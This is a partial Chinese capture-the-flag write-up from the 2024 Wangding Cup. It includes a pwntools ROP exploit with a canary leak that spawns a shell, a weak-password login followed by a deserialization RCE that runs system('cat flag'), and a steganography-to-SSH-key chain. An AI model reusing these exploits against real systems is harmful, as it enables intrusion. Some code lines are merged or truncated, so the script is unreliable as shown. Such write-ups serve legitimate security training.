RE02
使用jadx,黄色部分为密文,使用aes 加密
解密秘钥,ecb 模式
PWN02
使 用 脚 本 替 换 环 境 ip 端 口 , 执 行 命 令 获 取 权 限 , 查 找 flag, 获 得 flag
from pwn import *
remote_conn = remote("0192f6332a7678de9fe15237d593bac9.4rgk.dg07.ciihw.cn","45824")
context.log_level = 'debug' remote_conn.recvuntil(b": ")
canary_value = int(remote_conn.recvline(), 16)
remote_conn.recvline()
remote_conn.send(b"a" * 0x28 + p32(1) + b"a" * 0x10)
remote_conn.recvline()
remote_conn.send(b"0")
remote_conn.recvline()
remote_conn.send(b"b" * 0x70)
remote_conn.recvline()
rop_pop_rdi = 0x40213f
rop_pop_rsi = 0x40a1ae
rop_pop_rdx_rbx = 0x485feb
rop_pop_rax = 0x450277
rop_syscall = 0x41AC26
payload = b"" payload += b"a" * 0x64 + p32(0x11111111) + b"a" * 0x90 + p64(canary_value) + b"a" * 0x8 + p64(canary_value) + b"a" * 0x8
payload += p64(rop_pop_rdi) + p64(0) + p64(rop_pop_rsi) + p64(0x4c5000) +p64(rop_pop_rdx_rbx) + p64(0x8) + p64(0) + p64(rop_pop_rax) + p64(0) + p64(rop_syscall)
payload += p64(rop_pop_rdi) + p64(0x4c5000) + p64(rop_pop_rsi) + p64(0) +p64(rop_pop_rdx_rbx) + p64(0) + p64(0) + p64(rop_pop_rax) + p64(0x3b) + p64(rop_syscall)
remote_conn.send(payload)
sleep(0.5)
remote_conn.send(b"/bin/shx00")
remote_conn.interactive(
web01
弱口令: admin/admin登陆成功
访问 /login.php?m=admin &c=Field&a=arctype_index&lang=cn 接口
添加字段,抓包修改:
编辑再提交抓包修改
访问 /login.php?m=admin &c=Field&a=channel_edit&channel_id=-99&id=592&_ajax=1 接口触发反序列化 rce
Rce 读取 flag:
/a.php617ac73525b3 33bea4ac35a717dd8b0a.php?_=system("cat ../../../../../../../../../flag.txt");
web03
利用dirsearch扫描目录
robots内容
访问wbStego4.bmp,利用wbStego4工具解出公钥文件
获得公钥文件
利用rsatool导入公钥解出私钥,要在文件前面添加ssh-rsa并且保留AAAA之后的数据 删除前面的
保存用ssh登录输入用户root456即可得到flag
原文始发于微信公众号(励行安全):CTF | 2024网鼎杯玄武组WP(部分)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论